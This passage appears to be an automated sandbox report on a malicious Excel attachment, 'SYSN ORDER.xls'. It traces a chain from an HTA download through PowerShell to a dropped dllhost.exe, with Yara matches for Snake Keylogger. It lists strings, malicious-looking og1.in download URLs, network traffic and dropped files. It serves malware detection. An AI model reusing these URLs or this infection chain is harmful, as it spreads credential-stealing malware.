            Source: mshta.exe, 00000004.00000002.420401597.0000000003072000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.417457596.0000000003072000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.416448809.0000000003072000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.415947263.000000000306D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.415965686.0000000003071000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.450490527.000000001C23C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.471498465.00000000037B6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000002.472492057.00000000037B6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.468426129.00000000037B6000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.629441326.0000000000758000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000017.00000002.629356941.000000000062A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
            Source: mshta.exe, 00000004.00000002.420401597.0000000003072000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.417457596.0000000003072000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.416448809.0000000003072000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.415947263.000000000306D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.415965686.0000000003071000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.450490527.000000001C23C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.471498465.00000000037CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000002.472492057.00000000037CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.470945172.00000000037CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.468426129.00000000037CC000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.629441326.0000000000758000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000017.00000002.629356941.000000000062A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
            Source: mshta.exe, 00000004.00000002.420401597.0000000003072000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.417457596.0000000003072000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.416448809.0000000003072000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.415947263.000000000306D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.415965686.0000000003071000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.450490527.000000001C23C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.471498465.00000000037B6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000002.472492057.00000000037B6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.468426129.00000000037B6000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.629441326.0000000000758000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000017.00000002.629356941.000000000062A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
            Source: mshta.exe, 00000004.00000002.420401597.0000000003072000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.417457596.0000000003072000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.416448809.0000000003072000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.415947263.000000000306D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.415965686.0000000003071000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.450490527.000000001C1B0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.471498465.00000000037B6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000002.472492057.00000000037B6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.468426129.00000000037B6000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.629441326.0000000000758000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000017.00000002.629356941.000000000062A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com05
            Source: mshta.exe, 00000004.00000003.417457596.0000000003091000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.416448809.0000000003091000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.420401597.0000000003072000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.417457596.0000000003072000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.415947263.0000000003091000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.416448809.0000000003072000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.415947263.000000000306D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.420401597.0000000003091000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.415965686.0000000003071000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.450490527.000000001C23C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.471498465.00000000037B6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000002.472492057.00000000037B6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.468426129.00000000037B6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.471498465.00000000037CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000002.472492057.00000000037CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.470945172.00000000037CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.468426129.00000000037CC000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.629441326.0000000000758000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000017.00000002.629356941.000000000062A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net03
            Source: mshta.exe, 00000004.00000002.420401597.0000000003072000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.417457596.0000000003072000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.416448809.0000000003072000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.415947263.000000000306D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.415965686.0000000003071000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.450490527.000000001C23C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.471498465.00000000037CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000002.472492057.00000000037CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.470945172.00000000037CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.468426129.00000000037CC000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.629441326.0000000000758000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000017.00000002.629356941.000000000062A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net0D
            Source: RegSvcs.exe, 0000000E.00000002.630259466.00000000026AE000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.630259466.00000000026B6000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.630259466.000000000261F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.630259466.00000000026F1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.630259466.0000000002700000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.630259466.00000000026C4000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.630259466.0000000002696000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000017.00000002.630215962.0000000002499000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000017.00000002.630215962.00000000024B6000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000017.00000002.630215962.00000000024FF000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000017.00000002.630215962.00000000024AE000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000017.00000002.630215962.00000000024F1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000017.00000002.630215962.00000000024C3000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000017.00000002.630215962.000000000241E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://reallyfreegeoip.org
            Source: RegSvcs.exe, 00000017.00000002.630215962.0000000002499000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://reallyfreegeoip.orgPLZ
            Source: powershell.exe, 00000007.00000002.441192247.0000000002361000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.630259466.0000000002561000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.478774316.0000000002421000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000017.00000002.630215962.0000000002361000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: mshta.exe, 00000004.00000002.420401597.0000000003072000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.417457596.0000000003072000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.416448809.0000000003072000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.415947263.000000000306D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.415965686.0000000003071000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.450490527.000000001C23C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.471498465.00000000037CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000002.472492057.00000000037CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.470945172.00000000037CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.468426129.00000000037CC000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.629441326.0000000000758000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000017.00000002.629356941.000000000062A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
            Source: mshta.exe, 00000004.00000002.420401597.0000000003072000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.417457596.0000000003072000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.416448809.0000000003072000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.415947263.000000000306D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.415965686.0000000003071000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.450490527.000000001C23C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.471498465.00000000037B6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000002.472492057.00000000037B6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.468426129.00000000037B6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.471498465.00000000037CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000002.472492057.00000000037CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.470945172.00000000037CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.468426129.00000000037CC000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.629441326.0000000000758000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000017.00000002.629356941.000000000062A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
            Source: powershell.exe, 00000007.00000002.448635325.0000000012391000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
            Source: powershell.exe, 00000007.00000002.448635325.0000000012391000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
            Source: powershell.exe, 00000007.00000002.448635325.0000000012391000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
            Source: powershell.exe, 00000007.00000002.448635325.0000000012391000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
            Source: mshta.exe, 00000004.00000003.417457596.0000000003091000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.416448809.0000000003091000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.420401597.0000000003072000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.417457596.0000000003072000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.415947263.0000000003091000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.416448809.0000000003072000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.420177418.00000000002B0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.415947263.000000000306D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.420401597.0000000003091000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.415965686.0000000003071000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.420256019.00000000002B0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.417961702.00000000002B0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.471062892.0000000000131000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.467118716.0000000000142000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000002.472118068.0000000000131000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000002.472462017.0000000003730000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://og1.in/
            Source: mshta.exe, 0000000C.00000002.472462017.0000000003730000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://og1.in/=#
            Source: mshta.exe, 0000000C.00000002.472075496.00000000000FA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000002.472118068.0000000000131000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.467118716.0000000000131000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://og1.in/cIP5a8
            Source: mshta.exe, 00000004.00000002.420227515.000000000024D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.420227515.000000000022A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://og1.in/cIP5a8$
            Source: mshta.exe, 0000000C.00000002.472075496.00000000000FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://og1.in/cIP5a8&W
            Source: mshta.exe, 00000004.00000003.417457596.00000000030B6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.420401597.00000000030B6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.415947263.00000000030B6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.416448809.00000000030B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://og1.in/cIP5a8H
            Source: mshta.exe, 0000000C.00000002.472075496.00000000000FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://og1.in/cIP5a8K
            Source: mshta.exe, 0000000C.00000002.472075496.00000000000FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://og1.in/cIP5a8O
            Source: SYSN ORDER.xls, B8230000.0.drString found in binary or memory: https://og1.in/cIP5a8m
            Source: mshta.exe, 0000000C.00000002.472462017.0000000003730000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://og1.in/cIP5a8pdate.hta
            Source: RegSvcs.exe, 0000000E.00000002.630259466.00000000026AE000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.630259466.00000000026B6000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.630259466.00000000026F1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.630259466.0000000002700000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.630259466.00000000026C4000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.630259466.0000000002606000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.630259466.0000000002649000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.630259466.0000000002696000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000017.00000002.630215962.0000000002499000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000017.00000002.630215962.0000000002448000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000017.00000002.630215962.00000000024B6000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000017.00000002.630215962.00000000024FF000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000017.00000002.630215962.00000000024AE000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000017.00000002.630215962.00000000024F1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000017.00000002.630215962.00000000024C3000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000017.00000002.630215962.0000000002405000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
            Source: RegSvcs.exe, 0000000E.00000002.630259466.0000000002606000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000017.00000002.629152726.0000000000416000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 00000017.00000002.630215962.0000000002405000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
            Source: RegSvcs.exe, 00000017.00000002.630215962.0000000002405000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33
            Source: RegSvcs.exe, 0000000E.00000002.630259466.00000000026AE000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.630259466.00000000026B6000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.630259466.00000000026F1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.630259466.0000000002700000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.630259466.00000000026C4000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.630259466.0000000002649000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.630259466.0000000002696000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000017.00000002.630215962.0000000002499000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000017.00000002.630215962.0000000002448000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000017.00000002.630215962.00000000024B6000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000017.00000002.630215962.00000000024FF000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000017.00000002.630215962.00000000024AE000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000017.00000002.630215962.00000000024F1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000017.00000002.630215962.00000000024C3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.334
            Source: RegSvcs.exe, 00000017.00000002.630215962.00000000024F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33PLZ
            Source: mshta.exe, 00000004.00000002.420401597.0000000003072000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.417457596.0000000003072000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.416448809.0000000003072000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.415947263.000000000306D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.415965686.0000000003071000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.450490527.000000001C1B0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.450490527.000000001C23C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.471498465.00000000037B6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000002.472492057.00000000037B6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.468426129.00000000037B6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.471498465.00000000037CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000002.472492057.00000000037CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.470945172.00000000037CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.468426129.00000000037CC000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.629441326.0000000000758000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000017.00000002.629356941.000000000062A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
            Source: unknownNetwork traffic detected: HTTP traffic on port 49185 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49169
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49202
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49168
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49189
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49200
            Source: unknownNetwork traffic detected: HTTP traffic on port 49183 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49188
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49165
            Source: unknownNetwork traffic detected: HTTP traffic on port 49181 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49163
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49185
            Source: unknownNetwork traffic detected: HTTP traffic on port 49202 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49183
            Source: unknownNetwork traffic detected: HTTP traffic on port 49189 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49200 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49181
            Source: unknownNetwork traffic detected: HTTP traffic on port 49168 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49170 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49174 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49163 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49179
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49177
            Source: unknownNetwork traffic detected: HTTP traffic on port 49165 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49190 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49198
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49175
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49174
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49196
            Source: unknownNetwork traffic detected: HTTP traffic on port 49188 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49194
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49170
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49192
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49190
            Source: unknownNetwork traffic detected: HTTP traffic on port 49196 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49198 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49175 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49169 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49194 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49192 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49177 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49179 -> 443
            Source: unknownHTTPS traffic detected: 172.67.216.244:443 -> 192.168.2.22:49163 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.216.244:443 -> 192.168.2.22:49165 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.78.54:443 -> 192.168.2.22:49170 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.78.54:443 -> 192.168.2.22:49169 version: TLS 1.2
            Source: C:\Windows\System32\mshta.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
            Source: C:\Windows\System32\mshta.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: 00000017.00000002.629152726.0000000000416000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 00000017.00000002.629152726.0000000000416000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
            Source: Process Memory Space: RegSvcs.exe PID: 3176, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: Process Memory Space: RegSvcs.exe PID: 3176, type: MEMORYSTRMatched rule: Detects Snake Keylogger Author: ditekSHen
            Excel sheet contains many unusual embedded objects
            Source: SYSN ORDER.xlsOLE: Microsoft Excel 2007+
            Source: B8230000.0.drOLE: Microsoft Excel 2007+
            Microsoft Office drops suspicious files
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\IEnetbokkworkingforupdate[1].htaJump to behavior
            Powershell drops PE file
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\dllhost.exeJump to dropped file
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\dllhost[1].exeJump to dropped file
            Source: C:\Users\user\AppData\Roaming\dllhost.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
            Source: C:\Users\user\AppData\Roaming\dllhost.exeMemory allocated: 770B0000 page execute and read and write
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMemory allocated: 770B0000 page execute and read and write
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_000007FE89A7352E7_2_000007FE89A7352E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_003C503814_2_003C5038
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_003C306514_2_003C3065
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_003C389114_2_003C3891
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_003C78C014_2_003C78C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_003C413014_2_003C4130
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_003C291014_2_003C2910
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_003C5B1814_2_003C5B18
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_003C3B7014_2_003C3B70
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_003C2BF014_2_003C2BF0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_003C844814_2_003C8448
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_003C35B014_2_003C35B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_003C3E5114_2_003C3E51
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_003CC75014_2_003CC750
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_003C674114_2_003C6741
